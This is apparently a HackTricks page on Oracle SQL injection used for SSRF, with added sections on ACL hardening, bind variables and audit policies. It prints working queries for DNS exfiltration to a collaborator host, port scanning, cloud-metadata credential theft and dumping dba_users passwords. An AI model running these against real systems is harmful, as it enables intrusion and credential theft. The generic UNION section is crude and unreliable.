Oracle injection
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This post is served as a Wayback Machine copy of the deleted post from https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/.
SSRF
Using Oracle to perform Out of Band HTTP and DNS requests is well documented, but mostly as a means of exfiltrating data through SQL injections. The same techniques/functions can be modified to perform other SSRF/XSPA attacks.
Installing Oracle can be really painful, especially if you just want a quick instance to try commands against. Abhisek Datta at Appsecco pointed me to https://github.com/MaksymBilenko/docker-oracle-12c, which let me set up an instance on a t2.large AWS Ubuntu machine with Docker.
I ran the Docker command with the --network="host" flag so that Oracle would mimic a native install with full network access, for the rest of this blogpost.
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
Oracle packages that support a URL or a Hostname/Port Number specification
Several Oracle packages support a URL or a Hostname/Port Number specification. To find them, I ran the following Google search against the Oracle Database Online Documentation:
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
The search returned the following results (not all of them can be used to make outbound network requests):
- DBMS_NETWORK_ACL_ADMIN
- UTL_SMTP
- DBMS_XDB
- DBMS_SCHEDULER
- DBMS_XDB_CONFIG
- DBMS_AQ
- UTL_MAIL
- DBMS_AQELM
- DBMS_NETWORK_ACL_UTILITY
- DBMS_MGD_ID_UTL
- UTL_TCP
- DBMS_MGWADM
- DBMS_STREAMS_ADM
- UTL_HTTP
This crude search obviously skips packages like DBMS_LDAP (which allows passing a hostname and port number), as its documentation page simply points you to a different location. Hence, there may be other Oracle packages that can be abused to make outbound requests that I may have missed.
In any case, let’s take a look at some of the packages that we have discovered and listed above.
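One item in the list above, DBMS_NETWORK_ACL_ADMIN, is not an attack primitive but the control that governs all the others: since Oracle 11g, UTL_TCP, UTL_HTTP, UTL_SMTP and DBMS_LDAP can only reach a host/port that a network ACL grants to the calling database user, and anything else fails with ORA-24247 (network access denied by access control list). The following added example, which is not part of the original post, shows how a DBA inventories existing grants and replaces a wildcard grant with a narrow one. It assumes a 12c database, a hypothetical application account APP_USER and a hypothetical host mail.example.com.

```sql
-- Added example (not from the original post). Assumes a DBA session on 12c,
-- a hypothetical application account APP_USER and hypothetical host mail.example.com.

-- 1. Inventory: which principals may open outbound connections, and to where?
--    A wildcard host ('*') with no port range is the setting that turns every
--    package in the list above into a free SSRF / port-scan primitive.
SELECT host, lower_port, upper_port, principal, privilege, grant_type
  FROM dba_host_aces
 ORDER BY host, principal;

-- 2. Remove an over-broad grant (if step 1 showed one for APP_USER on '*').
BEGIN
  DBMS_NETWORK_ACL_ADMIN.REMOVE_HOST_ACE(
    host => '*',
    ace  => xs$ace_type(privilege_list => xs$name_list('connect'),
                        principal_name => 'APP_USER',
                        principal_type => xs_acl.ptype_db));
  COMMIT;
END;
/

-- 3. Grant only what the application needs: connect to one host, one port.
BEGIN
  DBMS_NETWORK_ACL_ADMIN.APPEND_HOST_ACE(
    host       => 'mail.example.com',
    lower_port => 25,
    upper_port => 25,
    ace        => xs$ace_type(privilege_list => xs$name_list('connect'),
                              principal_name => 'APP_USER',
                              principal_type => xs_acl.ptype_db));
  COMMIT;
END;
/

-- 4. Verify from APP_USER's own session: any other host/port now raises
--    ORA-24247 instead of the open/closed distinction described in the post.
SET SERVEROUTPUT ON
DECLARE
  c utl_tcp.connection;
BEGIN
  c := utl_tcp.open_connection('169.254.169.254', 80, tx_timeout => 2);
  utl_tcp.close_connection(c);
EXCEPTION
  WHEN OTHERS THEN
    dbms_output.put_line(SQLERRM);  -- expect ORA-24247
END;
/
```

The inventory query in step 1 is the quickest audit of an Oracle instance for this whole class of issue: any row with host '*' granted to an application account, or to PUBLIC, means an injection in that application becomes a network pivot.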
DBMS_LDAP.INIT
The DBMS_LDAP package allows access to data on LDAP servers. Its INIT() function initializes a session with an LDAP server and takes a hostname and a port number as arguments.
This function has been documented before to show exfiltration of data over DNS, like below:
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
Since we can specify a hostname and a port number, we can also use this function as a rudimentary port scanner. Some examples:
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.
An ORA-31203 error indicates the port is closed, while a session value being returned indicates the port is open.
UTL_SMTP
The UTL_SMTP package is designed for sending e-mail over SMTP. The example on the Oracle documentation site shows how to send an e-mail with it. What is interesting for us, however, is the ability to provide a host and port specification.
A crude example using the UTL_SMTP.OPEN_CONNECTION function, with a 2 second timeout:
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;
/
DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;
/
An ORA-29276: transfer timeout shows the port is open but no SMTP connection was established, while an ORA-29278: SMTP transient error: 421 Service not available shows that the port is closed.
UTL_TCP
The UTL_TCP package and its procedures and functions allow TCP/IP based communication with services. If programmed for a specific service, this package can easily become a way into the network or perform full Server Side Requests, as all aspects of a TCP/IP connection can be controlled.
The example on the Oracle documentation site shows how you can use this package to make a raw TCP connection to fetch a web page. We can simplify it a little and use it to make requests to the instance metadata service, for example, or to an arbitrary TCP/IP service.
set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/
UTL_HTTP and Web Requests
Perhaps the most common and widely documented technique in every Out of Band Oracle SQL Injection tutorial is the UTL_HTTP package. The package is defined by the documentation as: The UTL_HTTP package makes Hypertext Transfer Protocol (HTTP) callouts from SQL and PL/SQL. You can use it to access data on the Internet over HTTP.
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
Oracle Injection
Oracle Injection is a technique used to exploit vulnerabilities in Oracle databases by injecting malicious SQL queries. This can lead to unauthorized access, data manipulation, and even complete control over the database.
Basic Oracle Injection
In Oracle databases, the UNION operator can be used to combine the results of two or more SELECT statements into a single result set. This can be leveraged to extract sensitive information from the database.
Extracting Data
To extract data from an Oracle database, you can use the following query:
SELECT column_name FROM table_name UNION SELECT NULL FROM dual;
Replace column_name with the name of the column you want to extract data from, and table_name with the name of the table.
Enumerating Tables
To enumerate the tables in an Oracle database, you can use the following query:
SELECT table_name FROM all_tables UNION SELECT NULL FROM dual;
Enumerating Columns
To enumerate the columns in a specific table, you can use the following query:
SELECT column_name FROM all_tab_columns WHERE table_name = 'table_name' UNION SELECT NULL FROM dual;
Replace table_name with the name of the table you want to enumerate columns from.
Extracting Usernames and Passwords
To extract usernames and passwords from an Oracle database, you can use the following query:
SELECT username || ':' || password FROM dba_users UNION SELECT NULL FROM dual;
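Every query in this section only works because the application pasted attacker-controlled text into a statement. The following added example, which is not from the original page, shows the PL/SQL root cause beside its fix: dynamic SQL built by concatenation versus the same lookup with a bind variable, plus DBMS_ASSERT for the case where the untrusted piece is an identifier and cannot be bound. It assumes a hypothetical table APP_USERS(USERNAME, EMAIL).

```sql
-- Added example (not from the original page). Hypothetical schema:
-- a table APP_USERS(USERNAME, EMAIL) that an application looks up by name.

-- Vulnerable: the caller-supplied value becomes part of the statement text.
-- A value such as  x' OR '1'='1  rewrites the WHERE clause, and the UNION
-- tricks above can append a second SELECT against any readable view.
CREATE OR REPLACE FUNCTION lookup_email_unsafe(p_user IN VARCHAR2)
  RETURN VARCHAR2 IS
  v_email VARCHAR2(200);
BEGIN
  EXECUTE IMMEDIATE
    'SELECT email FROM app_users WHERE username = ''' || p_user || ''''
    INTO v_email;
  RETURN v_email;
END;
/

-- Fixed: a bind variable. The value is never part of the statement text, so
-- quotes, UNION and comment markers are just characters inside a string.
CREATE OR REPLACE FUNCTION lookup_email(p_user IN VARCHAR2)
  RETURN VARCHAR2 IS
  v_email VARCHAR2(200);
BEGIN
  EXECUTE IMMEDIATE
    'SELECT email FROM app_users WHERE username = :u'
    INTO v_email USING p_user;
  RETURN v_email;
END;
/

-- When the untrusted piece is an identifier (a table or column name) it cannot
-- be bound; validate it with DBMS_ASSERT instead of trusting it.
CREATE OR REPLACE FUNCTION count_rows(p_table IN VARCHAR2)
  RETURN NUMBER IS
  v_n NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SQL_OBJECT_NAME(p_table)
    INTO v_n;  -- ORA-44002 (invalid object name) if p_table is not an existing object
  RETURN v_n;
END;
/
```

The bind-variable version also has the side effect that every call shares one parsed cursor, so a sudden growth of distinct SQL texts for a single application statement in V$SQL is itself a cheap indicator that concatenation is being exercised somewhere.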
Performing Port Scanning
You can also use Oracle Injection to perform rudimentary port scanning by leveraging the UTL_TCP package in Oracle. This package allows you to create TCP connections and send/receive data.
To perform port scanning, you can use the following query:
DECLARE
c utl_tcp.connection;
BEGIN
c := utl_tcp.open_connection('target_ip', target_port);
utl_tcp.close_connection(c);
EXCEPTION
WHEN OTHERS THEN
NULL;
END;
Replace target_ip with the IP address of the target and target_port with the port number you want to scan.
Keep in mind that port scanning is a potentially intrusive activity and may be illegal or against the terms of service of the target system. Always ensure you have proper authorization before performing any port scanning activities.
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
An ORA-12541: TNS:no listener or a TNS:operation timed out is a sign that the TCP port is closed, whereas an ORA-29263: HTTP protocol error or returned data is a sign that the port is open.
Another package I have used in the past with varied success is the GETCLOB() method of the HTTPURITYPE Oracle abstract type, which allows you to interact with a URL and provides support for the HTTP protocol. The GETCLOB() method is used to fetch the GET response from a URL as a CLOB data type.
select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
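Every technique on this page, from the DBMS_LDAP DNS exfiltration to the UTL_HTTP and HTTPURITYPE metadata requests, executes a SYS callout package under the injected application account, which makes it easy to audit. The following added example, which is not from the original post, creates a unified audit policy for those packages and shows two triage queries over the resulting trail. It assumes Oracle 12c with unified auditing available (the default mixed-mode install) and a session holding the AUDIT_ADMIN role.

```sql
-- Added example (not from the original post). Assumes Oracle 12c with unified
-- auditing available and a session holding AUDIT_ADMIN.

-- 1. Audit every execution of the callout packages enumerated in the post.
CREATE AUDIT POLICY net_callout_pol
  ACTIONS EXECUTE ON sys.utl_http,
          EXECUTE ON sys.utl_tcp,
          EXECUTE ON sys.utl_smtp,
          EXECUTE ON sys.dbms_ldap;
AUDIT POLICY net_callout_pol;

-- 2. Triage: callouts grouped by database user and client program. An
--    application account that starts calling UTL_HTTP or DBMS_LDAP from the
--    web tier's connection pool is the signature of the injection-to-SSRF path.
SELECT dbusername, client_program_name, object_name,
       COUNT(*)             AS calls,
       MIN(event_timestamp) AS first_seen,
       MAX(event_timestamp) AS last_seen
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%NET_CALLOUT_POL%'
 GROUP BY dbusername, client_program_name, object_name
 ORDER BY last_seen DESC;

-- 3. Pull the statement text for callouts that target the link-local metadata
--    address or build a hostname out of query results (the '||'.'||' pattern
--    of the DNS exfiltration example above).
SELECT event_timestamp, dbusername, object_name, sql_text
  FROM unified_audit_trail
 WHERE unified_audit_policies LIKE '%NET_CALLOUT_POL%'
   AND (sql_text LIKE '%169.254.169.254%'
        OR sql_text LIKE '%||''.''||%')
 ORDER BY event_timestamp DESC;
```

The policy records the EXECUTE on the package, not the eventual network destination, so pair it with the DBA_HOST_ACES inventory: the audit trail tells you who called out, the ACL tells you where they were allowed to.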